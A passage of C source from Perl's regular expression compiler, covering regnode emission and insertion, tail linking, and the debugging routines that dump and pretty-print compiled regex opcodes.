change_engine_size(pRExC_state, (Ptrdiff_t) 1 + extra_size);
NODE_ALIGN_FILL(REGNODE_p(ret));
#ifndef RE_TRACK_PATTERN_OFFSETS
PERL_UNUSED_ARG(name);
PERL_UNUSED_ARG(op);
#else
assert(extra_size >= regarglen[op] || PL_regkind[op] == ANYOF);
if (RExC_offsets) { /* MJD */
MJD_OFFSET_DEBUG(
("%s:%d: (op %s) %s %" UVuf " (len %" UVuf ") (max %" UVuf ").\n",
name, __LINE__,
PL_reg_name[op],
(UV)(RExC_emit) > RExC_offsets[0]
? "Overwriting end of array!\n" : "OK",
(UV)(RExC_emit),
(UV)(RExC_parse - RExC_start),
(UV)RExC_offsets[0]));
Set_Node_Offset(REGNODE_p(RExC_emit), RExC_parse + (op == END));
}
#endif
return(ret);
}
/*
- reg_node - emit a node
*/
STATIC regnode_offset /* Location. */
S_reg_node(pTHX_ RExC_state_t *pRExC_state, U8 op)
{
const regnode_offset ret = regnode_guts(pRExC_state, op, regarglen[op], "reg_node");
regnode_offset ptr = ret;
PERL_ARGS_ASSERT_REG_NODE;
assert(regarglen[op] == 0);
FILL_ADVANCE_NODE(ptr, op);
RExC_emit = ptr;
return(ret);
}
/*
- reganode - emit a node with an argument
*/
STATIC regnode_offset /* Location. */
S_reganode(pTHX_ RExC_state_t *pRExC_state, U8 op, U32 arg)
{
const regnode_offset ret = regnode_guts(pRExC_state, op, regarglen[op], "reganode");
regnode_offset ptr = ret;
PERL_ARGS_ASSERT_REGANODE;
/* ANYOF are special cased to allow non-length 1 args */
assert(regarglen[op] == 1);
FILL_ADVANCE_NODE_ARG(ptr, op, arg);
RExC_emit = ptr;
return(ret);
}
STATIC regnode_offset
S_reg2Lanode(pTHX_ RExC_state_t *pRExC_state, const U8 op, const U32 arg1, const I32 arg2)
{
/* emit a node with U32 and I32 arguments */
const regnode_offset ret = regnode_guts(pRExC_state, op, regarglen[op], "reg2Lanode");
regnode_offset ptr = ret;
PERL_ARGS_ASSERT_REG2LANODE;
assert(regarglen[op] == 2);
FILL_ADVANCE_NODE_2L_ARG(ptr, op, arg1, arg2);
RExC_emit = ptr;
return(ret);
}
/*
- reginsert - insert an operator in front of already-emitted operand
*
* That means that on exit 'operand' is the offset of the newly inserted
* operator, and the original operand has been relocated.
*
* IMPORTANT NOTE - it is the *callers* responsibility to correctly
* set up NEXT_OFF() of the inserted node if needed. Something like this:
*
* reginsert(pRExC, OPFAIL, orig_emit, depth+1);
* NEXT_OFF(orig_emit) = regarglen[OPFAIL] + NODE_STEP_REGNODE;
*
* ALSO NOTE - FLAGS(newly-inserted-operator) will be set to 0 as well.
*/
STATIC void
S_reginsert(pTHX_ RExC_state_t *pRExC_state, const U8 op,
const regnode_offset operand, const U32 depth)
{
regnode *src;
regnode *dst;
regnode *place;
const int offset = regarglen[(U8)op];
const int size = NODE_STEP_REGNODE + offset;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGINSERT;
PERL_UNUSED_CONTEXT;
PERL_UNUSED_ARG(depth);
/* (PL_regkind[(U8)op] == CURLY ? EXTRA_STEP_2ARGS : 0); */
DEBUG_PARSE_FMT("inst"," - %s", PL_reg_name[op]);
assert(!RExC_study_started); /* I believe we should never use reginsert once we have started
studying. If this is wrong then we need to adjust RExC_recurse
below like we do with RExC_open_parens/RExC_close_parens. */
change_engine_size(pRExC_state, (Ptrdiff_t) size);
src = REGNODE_p(RExC_emit);
RExC_emit += size;
dst = REGNODE_p(RExC_emit);
/* If we are in a "count the parentheses" pass, the numbers are unreliable,
* and [perl #133871] shows this can lead to problems, so skip this
* realignment of parens until a later pass when they are reliable */
if (! IN_PARENS_PASS && RExC_open_parens) {
int paren;
/*DEBUG_PARSE_FMT("inst"," - %" IVdf, (IV)RExC_npar);*/
/* remember that RExC_npar is rex->nparens + 1,
* iow it is 1 more than the number of parens seen in
* the pattern so far. */
for ( paren=0 ; paren < RExC_npar ; paren++ ) {
/* note, RExC_open_parens[0] is the start of the
* regex, it can't move. RExC_close_parens[0] is the end
* of the regex, it *can* move. */
if ( paren && RExC_open_parens[paren] >= operand ) {
/*DEBUG_PARSE_FMT("open"," - %d", size);*/
RExC_open_parens[paren] += size;
} else {
/*DEBUG_PARSE_FMT("open"," - %s","ok");*/
}
if ( RExC_close_parens[paren] >= operand ) {
/*DEBUG_PARSE_FMT("close"," - %d", size);*/
RExC_close_parens[paren] += size;
} else {
/*DEBUG_PARSE_FMT("close"," - %s","ok");*/
}
}
}
if (RExC_end_op)
RExC_end_op += size;
while (src > REGNODE_p(operand)) {
StructCopy(--src, --dst, regnode);
#ifdef RE_TRACK_PATTERN_OFFSETS
if (RExC_offsets) { /* MJD 20010112 */
MJD_OFFSET_DEBUG(
("%s(%d): (op %s) %s copy %" UVuf " -> %" UVuf " (max %" UVuf ").\n",
"reginsert",
__LINE__,
PL_reg_name[op],
(UV)(REGNODE_OFFSET(dst)) > RExC_offsets[0]
? "Overwriting end of array!\n" : "OK",
(UV)REGNODE_OFFSET(src),
(UV)REGNODE_OFFSET(dst),
(UV)RExC_offsets[0]));
Set_Node_Offset_To_R(REGNODE_OFFSET(dst), Node_Offset(src));
Set_Node_Length_To_R(REGNODE_OFFSET(dst), Node_Length(src));
}
#endif
}
place = REGNODE_p(operand); /* Op node, where operand used to be. */
#ifdef RE_TRACK_PATTERN_OFFSETS
if (RExC_offsets) { /* MJD */
MJD_OFFSET_DEBUG(
("%s(%d): (op %s) %s %" UVuf " <- %" UVuf " (max %" UVuf ").\n",
"reginsert",
__LINE__,
PL_reg_name[op],
(UV)REGNODE_OFFSET(place) > RExC_offsets[0]
? "Overwriting end of array!\n" : "OK",
(UV)REGNODE_OFFSET(place),
(UV)(RExC_parse - RExC_start),
(UV)RExC_offsets[0]));
Set_Node_Offset(place, RExC_parse);
Set_Node_Length(place, 1);
}
#endif
src = NEXTOPER(place);
FLAGS(place) = 0;
FILL_NODE(operand, op);
/* Zero out any arguments in the new node */
Zero(src, offset, regnode);
}
/*
- regtail - set the next-pointer at the end of a node chain of p to val. If
that value won't fit in the space available, instead returns FALSE.
(Except asserts if we can't fit in the largest space the regex
engine is designed for.)
- SEE ALSO: regtail_study
*/
STATIC bool
S_regtail(pTHX_ RExC_state_t * pRExC_state,
const regnode_offset p,
const regnode_offset val,
const U32 depth)
{
regnode_offset scan;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGTAIL;
#ifndef DEBUGGING
PERL_UNUSED_ARG(depth);
#endif
/* Find last node. */
scan = (regnode_offset) p;
for (;;) {
regnode * const temp = regnext(REGNODE_p(scan));
DEBUG_PARSE_r({
DEBUG_PARSE_MSG((scan==p ? "tail" : ""));
regprop(RExC_rx, RExC_mysv, REGNODE_p(scan), NULL, pRExC_state);
Perl_re_printf( aTHX_ "~ %s (%d) %s %s\n",
SvPV_nolen_const(RExC_mysv), scan,
(temp == NULL ? "->" : ""),
(temp == NULL ? PL_reg_name[OP(REGNODE_p(val))] : "")
);
});
if (temp == NULL)
break;
scan = REGNODE_OFFSET(temp);
}
if (reg_off_by_arg[OP(REGNODE_p(scan))]) {
assert((UV) (val - scan) <= U32_MAX);
ARG_SET(REGNODE_p(scan), val - scan);
}
else {
if (val - scan > U16_MAX) {
/* Populate this with something that won't loop and will likely
* lead to a crash if the caller ignores the failure return, and
* execution continues */
NEXT_OFF(REGNODE_p(scan)) = U16_MAX;
return FALSE;
}
NEXT_OFF(REGNODE_p(scan)) = val - scan;
}
return TRUE;
}
#ifdef DEBUGGING
/*
- regtail_study - set the next-pointer at the end of a node chain of p to val.
- Look for optimizable sequences at the same time.
- currently only looks for EXACT chains.
This is experimental code. The idea is to use this routine to perform
in place optimizations on branches and groups as they are constructed,
with the long term intention of removing optimization from study_chunk so
that it is purely analytical.
Currently only used when in DEBUG mode. The macro REGTAIL_STUDY() is used
to control which is which.
This used to return a value that was ignored. It was a problem that it is
#ifdef'd to be another function that didn't return a value. khw has changed it
so both currently return a pass/fail return.
*/
/* TODO: All four parms should be const */
STATIC bool
S_regtail_study(pTHX_ RExC_state_t *pRExC_state, regnode_offset p,
const regnode_offset val, U32 depth)
{
regnode_offset scan;
U8 exact = PSEUDO;
#ifdef EXPERIMENTAL_INPLACESCAN
I32 min = 0;
#endif
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGTAIL_STUDY;
/* Find last node. */
scan = p;
for (;;) {
regnode * const temp = regnext(REGNODE_p(scan));
#ifdef EXPERIMENTAL_INPLACESCAN
if (PL_regkind[OP(REGNODE_p(scan))] == EXACT) {
bool unfolded_multi_char; /* Unexamined in this routine */
if (join_exact(pRExC_state, scan, &min,
&unfolded_multi_char, 1, REGNODE_p(val), depth+1))
return TRUE; /* Was return EXACT */
}
#endif
if ( exact ) {
switch (OP(REGNODE_p(scan))) {
case EXACT:
case EXACT_ONLY8:
case EXACTL:
case EXACTF:
case EXACTFU_S_EDGE:
case EXACTFAA_NO_TRIE:
case EXACTFAA:
case EXACTFU:
case EXACTFU_ONLY8:
case EXACTFLU8:
case EXACTFUP:
case EXACTFL:
if( exact == PSEUDO )
exact= OP(REGNODE_p(scan));
else if ( exact != OP(REGNODE_p(scan)) )
exact= 0;
case NOTHING:
break;
default:
exact= 0;
}
}
DEBUG_PARSE_r({
DEBUG_PARSE_MSG((scan==p ? "tsdy" : ""));
regprop(RExC_rx, RExC_mysv, REGNODE_p(scan), NULL, pRExC_state);
Perl_re_printf( aTHX_ "~ %s (%d) -> %s\n",
SvPV_nolen_const(RExC_mysv),
scan,
PL_reg_name[exact]);
});
if (temp == NULL)
break;
scan = REGNODE_OFFSET(temp);
}
DEBUG_PARSE_r({
DEBUG_PARSE_MSG("");
regprop(RExC_rx, RExC_mysv, REGNODE_p(val), NULL, pRExC_state);
Perl_re_printf( aTHX_
"~ attach to %s (%" IVdf ") offset to %" IVdf "\n",
SvPV_nolen_const(RExC_mysv),
(IV)val,
(IV)(val - scan)
);
});
if (reg_off_by_arg[OP(REGNODE_p(scan))]) {
assert((UV) (val - scan) <= U32_MAX);
ARG_SET(REGNODE_p(scan), val - scan);
}
else {
if (val - scan > U16_MAX) {
/* Populate this with something that won't loop and will likely
* lead to a crash if the caller ignores the failure return, and
* execution continues */
NEXT_OFF(REGNODE_p(scan)) = U16_MAX;
return FALSE;
}
NEXT_OFF(REGNODE_p(scan)) = val - scan;
}
return TRUE; /* Was 'return exact' */
}
#endif
STATIC SV*
S_get_ANYOFM_contents(pTHX_ const regnode * n) {
/* Returns an inversion list of all the code points matched by the
* ANYOFM/NANYOFM node 'n' */
SV * cp_list = _new_invlist(-1);
const U8 lowest = (U8) ARG(n);
unsigned int i;
U8 count = 0;
U8 needed = 1U << PL_bitcount[ (U8) ~ FLAGS(n)];
PERL_ARGS_ASSERT_GET_ANYOFM_CONTENTS;
/* Starting with the lowest code point, any code point that ANDed with the
* mask yields the lowest code point is in the set */
for (i = lowest; i <= 0xFF; i++) {
if ((i & FLAGS(n)) == ARG(n)) {
cp_list = add_cp_to_invlist(cp_list, i);
count++;
/* We know how many code points (a power of two) that are in the
* set. No use looking once we've got that number */
if (count >= needed) break;
}
}
if (OP(n) == NANYOFM) {
_invlist_invert(cp_list);
}
return cp_list;
}
/*
- regdump - dump a regexp onto Perl_debug_log in vaguely comprehensible form
*/
#ifdef DEBUGGING
static void
S_regdump_intflags(pTHX_ const char *lead, const U32 flags)
{
int bit;
int set=0;
ASSUME(REG_INTFLAGS_NAME_SIZE <= sizeof(flags)*8);
for (bit=0; bit<REG_INTFLAGS_NAME_SIZE; bit++) {
if (flags & (1<<bit)) {
if (!set++ && lead)
Perl_re_printf( aTHX_ "%s", lead);
Perl_re_printf( aTHX_ "%s ", PL_reg_intflags_name[bit]);
}
}
if (lead) {
if (set)
Perl_re_printf( aTHX_ "\n");
else
Perl_re_printf( aTHX_ "%s[none-set]\n", lead);
}
}
static void
S_regdump_extflags(pTHX_ const char *lead, const U32 flags)
{
int bit;
int set=0;
regex_charset cs;
ASSUME(REG_EXTFLAGS_NAME_SIZE <= sizeof(flags)*8);
for (bit=0; bit<REG_EXTFLAGS_NAME_SIZE; bit++) {
if (flags & (1<<bit)) {
if ((1<<bit) & RXf_PMf_CHARSET) { /* Output separately, below */
continue;
}
if (!set++ && lead)
Perl_re_printf( aTHX_ "%s", lead);
Perl_re_printf( aTHX_ "%s ", PL_reg_extflags_name[bit]);
}
}
if ((cs = get_regex_charset(flags)) != REGEX_DEPENDS_CHARSET) {
if (!set++ && lead) {
Perl_re_printf( aTHX_ "%s", lead);
}
switch (cs) {
case REGEX_UNICODE_CHARSET:
Perl_re_printf( aTHX_ "UNICODE");
break;
case REGEX_LOCALE_CHARSET:
Perl_re_printf( aTHX_ "LOCALE");
break;
case REGEX_ASCII_RESTRICTED_CHARSET:
Perl_re_printf( aTHX_ "ASCII-RESTRICTED");
break;
case REGEX_ASCII_MORE_RESTRICTED_CHARSET:
Perl_re_printf( aTHX_ "ASCII-MORE_RESTRICTED");
break;
default:
Perl_re_printf( aTHX_ "UNKNOWN CHARACTER SET");
break;
}
}
if (lead) {
if (set)
Perl_re_printf( aTHX_ "\n");
else
Perl_re_printf( aTHX_ "%s[none-set]\n", lead);
}
}
#endif
void
Perl_regdump(pTHX_ const regexp *r)
{
#ifdef DEBUGGING
int i;
SV * const sv = sv_newmortal();
SV *dsv= sv_newmortal();
RXi_GET_DECL(r, ri);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGDUMP;
(void)dumpuntil(r, ri->program, ri->program + 1, NULL, NULL, sv, 0, 0);
/* Header fields of interest. */
for (i = 0; i < 2; i++) {
if (r->substrs->data[i].substr) {
RE_PV_QUOTED_DECL(s, 0, dsv,
SvPVX_const(r->substrs->data[i].substr),
RE_SV_DUMPLEN(r->substrs->data[i].substr),
PL_dump_re_max_len);
Perl_re_printf( aTHX_
"%s %s%s at %" IVdf "..%" UVuf " ",
i ? "floating" : "anchored",
s,
RE_SV_TAIL(r->substrs->data[i].substr),
(IV)r->substrs->data[i].min_offset,
(UV)r->substrs->data[i].max_offset);
}
else if (r->substrs->data[i].utf8_substr) {
RE_PV_QUOTED_DECL(s, 1, dsv,
SvPVX_const(r->substrs->data[i].utf8_substr),
RE_SV_DUMPLEN(r->substrs->data[i].utf8_substr),
30);
Perl_re_printf( aTHX_
"%s utf8 %s%s at %" IVdf "..%" UVuf " ",
i ? "floating" : "anchored",
s,
RE_SV_TAIL(r->substrs->data[i].utf8_substr),
(IV)r->substrs->data[i].min_offset,
(UV)r->substrs->data[i].max_offset);
}
}
if (r->check_substr || r->check_utf8)
Perl_re_printf( aTHX_
(const char *)
( r->check_substr == r->substrs->data[1].substr
&& r->check_utf8 == r->substrs->data[1].utf8_substr
? "(checking floating" : "(checking anchored"));
if (r->intflags & PREGf_NOSCAN)
Perl_re_printf( aTHX_ " noscan");
if (r->extflags & RXf_CHECK_ALL)
Perl_re_printf( aTHX_ " isall");
if (r->check_substr || r->check_utf8)
Perl_re_printf( aTHX_ ") ");
if (ri->regstclass) {
regprop(r, sv, ri->regstclass, NULL, NULL);
Perl_re_printf( aTHX_ "stclass %s ", SvPVX_const(sv));
}
if (r->intflags & PREGf_ANCH) {
Perl_re_printf( aTHX_ "anchored");
if (r->intflags & PREGf_ANCH_MBOL)
Perl_re_printf( aTHX_ "(MBOL)");
if (r->intflags & PREGf_ANCH_SBOL)
Perl_re_printf( aTHX_ "(SBOL)");
if (r->intflags & PREGf_ANCH_GPOS)
Perl_re_printf( aTHX_ "(GPOS)");
Perl_re_printf( aTHX_ " ");
}
if (r->intflags & PREGf_GPOS_SEEN)
Perl_re_printf( aTHX_ "GPOS:%" UVuf " ", (UV)r->gofs);
if (r->intflags & PREGf_SKIP)
Perl_re_printf( aTHX_ "plus ");
if (r->intflags & PREGf_IMPLICIT)
Perl_re_printf( aTHX_ "implicit ");
Perl_re_printf( aTHX_ "minlen %" IVdf " ", (IV)r->minlen);
if (r->extflags & RXf_EVAL_SEEN)
Perl_re_printf( aTHX_ "with eval ");
Perl_re_printf( aTHX_ "\n");
DEBUG_FLAGS_r({
regdump_extflags("r->extflags: ", r->extflags);
regdump_intflags("r->intflags: ", r->intflags);
});
#else
PERL_ARGS_ASSERT_REGDUMP;
PERL_UNUSED_CONTEXT;
PERL_UNUSED_ARG(r);
#endif /* DEBUGGING */
}
/* Should be synchronized with ANYOF_ #defines in regcomp.h */
#ifdef DEBUGGING
# if _CC_WORDCHAR != 0 || _CC_DIGIT != 1 || _CC_ALPHA != 2 \
|| _CC_LOWER != 3 || _CC_UPPER != 4 || _CC_PUNCT != 5 \
|| _CC_PRINT != 6 || _CC_ALPHANUMERIC != 7 || _CC_GRAPH != 8 \
|| _CC_CASED != 9 || _CC_SPACE != 10 || _CC_BLANK != 11 \
|| _CC_XDIGIT != 12 || _CC_CNTRL != 13 || _CC_ASCII != 14 \
|| _CC_VERTSPACE != 15
# error Need to adjust order of anyofs[]
# endif
static const char * const anyofs[] = {
"\\w",
"\\W",
"\\d",
"\\D",
"[:alpha:]",
"[:^alpha:]",
"[:lower:]",
"[:^lower:]",
"[:upper:]",
"[:^upper:]",
"[:punct:]",
"[:^punct:]",
"[:print:]",
"[:^print:]",
"[:alnum:]",
"[:^alnum:]",
"[:graph:]",
"[:^graph:]",
"[:cased:]",
"[:^cased:]",
"\\s",
"\\S",
"[:blank:]",
"[:^blank:]",
"[:xdigit:]",
"[:^xdigit:]",
"[:cntrl:]",
"[:^cntrl:]",
"[:ascii:]",
"[:^ascii:]",
"\\v",
"\\V"
};
#endif
/*
- regprop - printable representation of opcode, with run time support
*/
void
Perl_regprop(pTHX_ const regexp *prog, SV *sv, const regnode *o, const regmatch_info *reginfo, const RExC_state_t *pRExC_state)
{
#ifdef DEBUGGING
dVAR;
int k;
RXi_GET_DECL(prog, progi);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGPROP;
SvPVCLEAR(sv);
if (OP(o) > REGNODE_MAX) /* regnode.type is unsigned */
/* It would be nice to FAIL() here, but this may be called from
regexec.c, and it would be hard to supply pRExC_state. */
Perl_croak(aTHX_ "Corrupted regexp opcode %d > %d",
(int)OP(o), (int)REGNODE_MAX);
sv_catpv(sv, PL_reg_name[OP(o)]); /* Take off const! */
k = PL_regkind[OP(o)];
if (k == EXACT) {
sv_catpvs(sv, " ");
/* Using is_utf8_string() (via PERL_PV_UNI_DETECT)
* is a crude hack but it may be the best for now since
* we have no flag "this EXACTish node was UTF-8"
* --jhi */
pv_pretty(sv, STRING(o), STR_LEN(o), PL_dump_re_max_len,
PL_colors[0], PL_colors[1],
PERL_PV_ESCAPE_UNI_DETECT |
PERL_PV_ESCAPE_NONASCII |
PERL_PV_PRETTY_ELLIPSES |
PERL_PV_PRETTY_LTGT |
PERL_PV_PRETTY_NOCLEAR
);
} else if (k == TRIE) {
/* print the details of the trie in dumpuntil instead, as
* progi->data isn't available here */
const char op = OP(o);
const U32 n = ARG(o);
const reg_ac_data * const ac = IS_TRIE_AC(op) ?
(reg_ac_data *)progi->data->data[n] :
NULL;
const reg_trie_data * const trie
= (reg_trie_data*)progi->data->data[!IS_TRIE_AC(op) ? n : ac->trie];
Perl_sv_catpvf(aTHX_ sv, "-%s", PL_reg_name[o->flags]);
DEBUG_TRIE_COMPILE_r({
if (trie->jump)
sv_catpvs(sv, "(JUMP)");
Perl_sv_catpvf(aTHX_ sv,
"<S:%" UVuf "/%" IVdf " W:%" UVuf " L:%" UVuf "/%" UVuf " C:%" UVuf "/%" UVuf ">",
(UV)trie->startstate,
(IV)trie->statecount-1, /* -1 because of the unused 0 element */
(UV)trie->wordcount,
(UV)trie->minlen,
(UV)trie->maxlen,
(UV)TRIE_CHARCOUNT(trie),
(UV)trie->uniquecharcount
);
});
if ( IS_ANYOF_TRIE(op) || trie->bitmap ) {
sv_catpvs(sv, "[");
(void) put_charclass_bitmap_innards(sv,
((IS_ANYOF_TRIE(op))
? ANYOF_BITMAP(o)
: TRIE_BITMAP(trie)),
NULL,
NULL,
NULL,
FALSE
);
sv_catpvs(sv, "]");
}
} else if (k == CURLY) {
U32 lo = ARG1(o), hi = ARG2(o);
if (OP(o) == CURLYM || OP(o) == CURLYN || OP(o) == CURLYX)
Perl_sv_catpvf(aTHX_ sv, "[%d]", o->flags); /* Parenth number */
Perl_sv_catpvf(aTHX_ sv, "{%u,", (unsigned) lo);
if (hi == REG_INFTY)
sv_catpvs(sv, "INFTY");
else
Perl_sv_catpvf(aTHX_ sv, "%u", (unsigned) hi);
sv_catpvs(sv, "}");
}
else if (k == WHILEM && o->flags) /* Ordinal/of */
Perl_sv_catpvf(aTHX_ sv, "[%d/%d]", o->flags & 0xf, o->flags>>4);
else if (k == REF || k == OPEN || k == CLOSE
|| k == GROUPP || OP(o)==ACCEPT)
{
AV *name_list= NULL;
U32 parno= OP(o) == ACCEPT ? (U32)ARG2L(o) : ARG(o);
Perl_sv_catpvf(aTHX_ sv, "%" UVuf, (UV)parno); /* Parenth number */
if ( RXp_PAREN_NAMES(prog) ) {
name_list= MUTABLE_AV(progi->data->data[progi->name_list_idx]);
} else if ( pRExC_state ) {
name_list= RExC_paren_name_list;
}
if (name_list) {
if ( k != REF || (OP(o) < NREF)) {
SV **name= av_fetch(name_list, parno, 0 );
if (name)
Perl_sv_catpvf(aTHX_ sv, " '%" SVf "'", SVfARG(*name));
}
else {
SV *sv_dat= MUTABLE_SV(progi->data->data[ parno ]);
I32 *nums=(I32*)SvPVX(sv_dat);
SV **name= av_fetch(name_list, nums[0], 0 );
I32 n;
if (name) {
for ( n=0; n<SvIVX(sv_dat); n++ ) {
Perl_sv_catpvf(aTHX_ sv, "%s%" IVdf,
(n ? "," : ""), (IV)nums[n]);
}
Perl_sv_catpvf(aTHX_ sv, " '%" SVf "'", SVfARG(*name));
}
}
}
if ( k == REF && reginfo) {
U32 n = ARG(o); /* which paren pair */
I32 ln = prog->offs[n].start;
if (prog->lastparen < n || ln == -1 || prog->offs[n].end == -1)
Perl_sv_catpvf(aTHX_ sv, ": FAIL");
else if (ln == prog->offs[n].end)
Perl_sv_catpvf(aTHX_ sv, ": ACCEPT - EMPTY STRING");
else {
const char *s = reginfo->strbeg + ln;
Perl_sv_catpvf(aTHX_ sv, ": ");
Perl_pv_pretty( aTHX_ sv, s, prog->offs[n].end - prog->offs[n].start, 32, 0, 0,
PERL_PV_ESCAPE_UNI_DETECT|PERL_PV_PRETTY_NOCLEAR|PERL_PV_PRETTY_ELLIPSES|PERL_PV_PRETTY_QUOTE );
}
}
} else if (k == GOSUB) {
AV *name_list= NULL;
if ( RXp_PAREN_NAMES(prog) ) {
name_list= MUTABLE_AV(progi->data->data[progi->name_list_idx]);
} else if ( pRExC_state ) {
name_list= RExC_paren_name_list;
}
/* Paren and offset */
Perl_sv_catpvf(aTHX_ sv, "%d[%+d:%d]", (int)ARG(o),(int)ARG2L(o),
(int)((o + (int)ARG2L(o)) - progi->program) );
if (name_list) {
SV **name= av_fetch(name_list, ARG(o), 0 );
if (name)
Perl_sv_catpvf(aTHX_ sv, " '%" SVf "'", SVfARG(*name));
}
}
else if (k == LOGICAL)
/* 2: embedded, otherwise 1 */
Perl_sv_catpvf(aTHX_ sv, "[%d]", o->flags);
else if (k == ANYOF) {
const U8 flags = (OP(o) == ANYOFH) ? 0 : ANYOF_FLAGS(o);
bool do_sep = FALSE; /* Do we need to separate various components of
the output? */
/* Set if there is still an unresolved user-defined property */
SV *unresolved = NULL;
/* Things that are ignored except when the runtime locale is UTF-8 */
SV *only_utf8_locale_invlist = NULL;
/* Code points that don't fit in the bitmap */
SV *nonbitmap_invlist = NULL;
/* And things that aren't in the bitmap, but are small enough to be */
SV* bitmap_range_not_in_bitmap = NULL;
const bool inverted = flags & ANYOF_INVERT;
if (OP(o) == ANYOFL || OP(o) == ANYOFPOSIXL) {
if (ANYOFL_UTF8_LOCALE_REQD(flags)) {
sv_catpvs(sv, "{utf8-locale-reqd}");
}
if (flags & ANYOFL_FOLD) {
sv_catpvs(sv, "{i}");
}
}
/* If there is stuff outside the bitmap, get it */
if (ARG(o) != ANYOF_ONLY_HAS_BITMAP) {
(void) _get_regclass_nonbitmap_data(prog, o, FALSE,
&unresolved,
&only_utf8_locale_invlist,
&nonbitmap_invlist);
/* The non-bitmap data may contain stuff that could fit in the
* bitmap. This could come from a user-defined property being
* finally resolved when this call was done; or much more likely
* because there are matches that require UTF-8 to be valid, and so
* aren't in the bitmap. This is teased apart later */
_invlist_intersection(nonbitmap_invlist,
PL_InBitmap,
&bitmap_range_not_in_bitmap);
/* Leave just the things that don't fit into the bitmap */
_invlist_subtract(nonbitmap_invlist,
PL_InBitmap,
&nonbitmap_invlist);
}
/* Obey this flag to add all above-the-bitmap code points */
if (flags & ANYOF_MATCHES_ALL_ABOVE_BITMAP) {
nonbitmap_invlist = _add_range_to_invlist(nonbitmap_invlist,
NUM_ANYOF_CODE_POINTS,
UV_MAX);
}
/* Ready to start outputting. First, the initial left bracket */
Perl_sv_catpvf(aTHX_ sv, "[%s", PL_colors[0]);
if (OP(o) != ANYOFH) {
/* Then all the things that could fit in the bitmap */
do_sep = put_charclass_bitmap_innards(sv,
ANYOF_BITMAP(o),
bitmap_range_not_in_bitmap,
only_utf8_locale_invlist,
o,
/* Can't try inverting for a
* better display if there
* are things that haven't
* been resolved */
unresolved != NULL);
SvREFCNT_dec(bitmap_range_not_in_bitmap);
/* If there are user-defined properties which haven't been defined
* yet, output them. If the result is not to be inverted, it is
* clearest to output them in a separate [] from the bitmap range
* stuff. If the result is to be complemented, we have to show
* everything in one [], as the inversion applies to the whole
* thing. Use {braces} to separate them from anything in the
* bitmap and anything above the bitmap. */
if (unresolved) {
if (inverted) {
if (! do_sep) { /* If didn't output anything in the bitmap
*/
sv_catpvs(sv, "^");
}
sv_catpvs(sv, "{");
}
else if (do_sep) {
Perl_sv_catpvf(aTHX_ sv,"%s][%s", PL_colors[1],
PL_colors[0]);
}
sv_catsv(sv, unresolved);
if (inverted) {
sv_catpvs(sv, "}");
}
do_sep = ! inverted;
}
}
/* And, finally, add the above-the-bitmap stuff */
if (nonbitmap_invlist && _invlist_len(nonbitmap_invlist)) {
SV* contents;
/* See if truncation size is overridden */
const STRLEN dump_len = (PL_dump_re_max_len > 256)
? PL_dump_re_max_len
: 256;
/* This is output in a separate [] */
if (do_sep) {
Perl_sv_catpvf(aTHX_ sv,"%s][%s", PL_colors[1], PL_colors[0]);
}
/* And, for easy of understanding, it is shown in the
* uncomplemented form if possible. The one exception being if
* there are unresolved items, where the inversion has to be
* delayed until runtime */
if (inverted && ! unresolved) {
_invlist_invert(nonbitmap_invlist);
_invlist_subtract(nonbitmap_invlist, PL_InBitmap, &nonbitmap_invlist);
}
contents = invlist_contents(nonbitmap_invlist,
FALSE /* output suitable for catsv */
);
/* If the output is shorter than the permissible maximum, just do it. */
if (SvCUR(contents) <= dump_len) {
sv_catsv(sv, contents);
}
else {
const char * contents_string = SvPVX(contents);
STRLEN i = dump_len;
/* Otherwise, start at the permissible max and work back to the
* first break possibility */
while (i > 0 && contents_string[i] != ' ') {
i--;
}
if (i == 0) { /* Fail-safe. Use the max if we couldn't
find a legal break */
i = dump_len;
}
sv_catpvn(sv, contents_string, i);
sv_catpvs(sv, "...");
}
SvREFCNT_dec_NN(contents);
SvREFCNT_dec_NN(nonbitmap_invlist);
}
/* And finally the matching, closing ']' */
Perl_sv_catpvf(aTHX_ sv, "%s]", PL_colors[1]);
if (OP(o) == ANYOFH && FLAGS(o) != 0) {
Perl_sv_catpvf(aTHX_ sv, " (First UTF-8 byte=\\x%02x)", FLAGS(o));
}
SvREFCNT_dec(unresolved);
}
else if (k == ANYOFM) {
SV * cp_list = get_ANYOFM_contents(o);
Perl_sv_catpvf(aTHX_ sv, "[%s", PL_colors[0]);
if (OP(o) == NANYOFM) {
_invlist_invert(cp_list);
}
put_charclass_bitmap_innards(sv, NULL, cp_list, NULL, NULL, TRUE);
Perl_sv_catpvf(aTHX_ sv, "%s]", PL_colors[1]);
SvREFCNT_dec(cp_list);
}
else if (k == POSIXD || k == NPOSIXD) {
U8 index = FLAGS(o) * 2;
if (index < C_ARRAY_LENGTH(anyofs)) {
if (*anyofs[index] != '[') {
sv_catpvs(sv, "[");
}
sv_catpv(sv, anyofs[index]);
if (*anyofs[index] != '[') {
sv_catpvs(sv, "]");
}
}
else {
Perl_sv_catpvf(aTHX_ sv, "[illegal type=%d])", index);
}
}
else if (k == BOUND || k == NBOUND) {
/* Must be synced with order of 'bound_type' in regcomp.h */
const char * const bounds[] = {
"", /* Traditional */
"{gcb}",
"{lb}",
"{sb}",
"{wb}"
};
assert(FLAGS(o) < C_ARRAY_LENGTH(bounds));
sv_catpv(sv, bounds[FLAGS(o)]);
}
else if (k == BRANCHJ && (OP(o) == UNLESSM || OP(o) == IFMATCH)) {
Perl_sv_catpvf(aTHX_ sv, "[%d", -(o->flags));
if (o->next_off) {
Perl_sv_catpvf(aTHX_ sv, "..-%d", o->flags - o->next_off);
}
Perl_sv_catpvf(aTHX_ sv, "]");
}
else if (OP(o) == SBOL)
Perl_sv_catpvf(aTHX_ sv, " /%s/", o->flags ? "\\A" : "^");
/* add on the verb argument if there is one */
if ( ( k == VERB || OP(o) == ACCEPT || OP(o) == OPFAIL ) && o->flags) {
if ( ARG(o) )
Perl_sv_catpvf(aTHX_ sv, ":%" SVf,
SVfARG((MUTABLE_SV(progi->data->data[ ARG( o ) ]))));
else
sv_catpvs(sv, ":NULL");
}
#else
PERL_UNUSED_CONTEXT;
PERL_UNUSED_ARG(sv);
PERL_UNUSED_ARG(o);
